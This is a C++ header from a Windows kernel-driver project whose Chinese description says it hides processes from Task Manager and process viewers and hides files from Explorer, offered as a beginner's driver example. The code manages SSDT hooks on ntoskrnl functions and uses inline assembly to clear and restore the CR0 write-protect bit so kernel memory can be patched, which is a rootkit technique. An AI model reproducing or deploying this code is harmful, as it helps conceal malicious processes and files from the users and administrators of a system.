hookmng.h

实现了隐藏进程,使进程对任务管理器和进程查看器均不可见,使文件对资源管理器不可见 是驱动编程入门的好例子

#if !defined(AFX_HOOKMNG_H__CC466B43_CEF2_4037_8D0C_630973995D56__INCLUDED_)
#define AFX_HOOKMNG_H__CC466B43_CEF2_4037_8D0C_630973995D56__INCLUDED_

#include "common.h"
#include "SingleMode.h"
#include "HookFactory.h"

class HookMng
{
private:
	std::vector<Hook> mHooksInfo;
	std::deque<Hook> mHooksDeque;
	SingleProcessorMode mSingleMode;
	
public:
	HookMng(){}
	~HookMng(){ClearHooks();}

	bool QueueHook(IN Hook& refHook);
	
	bool ApplyQueuedHooks();
	void CleanQueuedHooks();

	void ClearHooks();

	/*	Function that hooking ntoskrnl functions in SDT */
protected:
	void ExApplyQueuedHooks();
	
	template<class _Type> 
		bool ExSetHook(
		_Type& refObject,				// Object of specified _Type
		void (_Type::*FuncPtr)());	// Pointer to a method of specified _Type

};
template<class _Type> 
bool HookMng::ExSetHook(
			   _Type& refObject,				// Object of specified _Type
			   void (_Type::*FuncPtr)())	// Pointer to a method of specified _Type
{
	ULONG CR0Reg;
	mSingleMode.Enter();

	__asm
	{
		mov eax, cr0
			mov CR0Reg,eax			// save WP bit
			and eax,0xFFFEFFFF		// clear WP bit
			mov cr0, eax
	}

	// Calling a method of specified _Type
	(refObject.*FuncPtr)();

	__asm
	{
		mov eax, CR0Reg
			mov cr0, eax            // restore WP bit                    
	}

	mSingleMode.Exit();

	return true;
}
#endif // !defined(AFX_HOOKMNG_H__CC466B43_CEF2_4037_8D0C_630973995D56__INCLUDED_)